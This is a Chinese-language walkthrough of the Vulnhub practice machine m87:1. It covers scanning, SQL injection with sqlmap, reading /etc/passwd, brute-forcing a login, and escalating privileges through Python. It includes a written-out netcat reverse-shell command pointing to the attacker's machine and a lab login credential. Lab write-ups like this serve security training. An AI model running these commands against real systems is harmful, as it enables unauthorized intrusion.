天天看點

Vulnhub靶機m87:1滲透

靶機介紹

官方下載下傳位址:http://www.vulnhub.com/entry/m87-1,595/

靶機難度容易,擁有兩個使用者,網絡擴充卡是NAT模式自動配置設定IP位址

Vulnhub靶機m87:1滲透

運作環境

靶機:網絡設為NAT,IP位址:192.168.174.138

攻擊機:同網段下的kali linux,IP位址:192.168.174.135

開始滲透

運作靶機

Vulnhub靶機m87:1滲透

靶機運作之後就提示了IP位址,端口和一個域名

掃一下端口看是否有其他存在

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

掃一下80端口的目錄

Vulnhub靶機m87:1滲透

開始通路得到的這些目錄

80端口的首頁

Vulnhub靶機m87:1滲透

admin

Vulnhub靶機m87:1滲透

/admin/backup/

Vulnhub靶機m87:1滲透

9090端口首頁

Vulnhub靶機m87:1滲透

找到了四個登入頁面

http://192.168.174.138/admin/ 輸入參數id=’ 出現報錯 id=1的時候回顯正常 說明存在注入點

Vulnhub靶機m87:1滲透

使用sqlmap跑一下,确實存在注入點

Vulnhub靶機m87:1滲透

在db的資料庫的users表當中找到了使用者名密碼

Vulnhub靶機m87:1滲透

經過多次嘗試這裡的使用者名密碼是無法登入任何一個登入頁面

但是資料庫存在flie權限,可以讀取檔案

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

檢視passwd

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

這裡看到确實隻存在兩個使用者

接下就不知道怎麼辦了,最後看了某一位大佬的視訊才做出來的,将所有使用者和密碼收集起來使用burp進行爆破,

最後使用charlotte:15The4Dm1n4L1f3登入9090端口的首頁

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

在終端選項裡面發現可以執行系統指令,接下來就是提權了,有好幾個方法可以提權

Vulnhub靶機m87:1滲透

第一個方法:

執行指令反彈shell到本地 nc -e /bin/bash 192.168.174.135 4444

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

使用python打開一個終端

Vulnhub靶機m87:1滲透

檢視old發現是python2.7可以利用os子產品調用本地的root的shell

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

第二個方法:

利用python相關的提權指令進行提權

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

也可以不反彈shell到本地直接在浏覽器執行提權指令

Vulnhub靶機m87:1滲透
Vulnhub靶機m87:1滲透

這個靶機到這裡就滲透結束了,難點在于擷取使用者名和密碼

繼續閱讀